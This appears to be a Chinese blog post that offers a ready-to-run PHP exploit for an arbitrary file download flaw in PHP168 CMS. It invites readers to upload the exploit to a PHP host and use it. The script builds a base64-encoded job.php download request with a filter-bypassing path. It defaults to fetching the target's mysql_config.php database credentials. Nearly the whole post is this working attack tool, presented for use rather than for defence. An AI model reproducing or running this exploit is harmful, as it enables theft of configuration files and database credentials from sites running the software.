网上有篇文章叫《Php168 读取任意文件漏洞》http://hi.baidu.com/saiy_hi/。其实应该叫任意文件下载漏洞。他公布的程序也是无法使用的。我特意写了个利用程序。程序写得很烂,莫怪。大家传到支持PHP的空间上就可以使用了。希望有人能做个EXE版的,PHP的太麻烦了。转载请注明出处:http://hi.baidu.com/lovealf/
<title>PHP168CMS下载任意文件漏洞利用程序(PHP版)===========by Alf</title>
<?php
$url=$_POST[url]; //PHP168根目录的URL
$file_path=$_POST[file_path];//目标文件名,若不是根目录的文件,请在文件名前加上目录名
$query = str_replace('php','ph'.$url.'p',$file_path);
$fuck_url = $url.'/job.php?job=download&url='.base64_encode($query);
if ($url&&$file_path){
echo "<br><br><br><br><br><br><br><br><center><a href=\"$fuck_url\">下载目标文件</a> <a href=# OnClick=\"javascript:history.back();\">返回</a></center>";
}
?>
<?php
if (empty($url)&&empty($file_path)){
?>
<br><br><br><br><br><br><br><br>
<center>
<form id="form1" name="form1" method="post" action="">
<table width="686">
<tr>
<td width="350" bordercolor="#FFFFFF"><label>
<input name="url" type="text" id="url" value="http://php168.com" size="50" />
</label></td>
<td width="324" bordercolor="#FFFFFF">PHP168根目录的URL。最右边不要带"/"号。</td>
</tr>
<tr>
<td bordercolor="#FFFFFF"><label>
<input name="file_path" type="text" value="/php168/mysql_config.php" size="50" />
</label></td>
<td bordercolor="#FFFFFF">文件路和文件名。最左边要带"/"号。</td>
</tr>
<tr>
<td bordercolor="#FFFFFF"><label>
<div align="center">
<input type="submit" name="Submit" value="提交" />
</div>
</label></td>
<td bordercolor="#FFFFFF"> </td>
</tr>
</table>
</form>
</center>
<?php
}
?> | 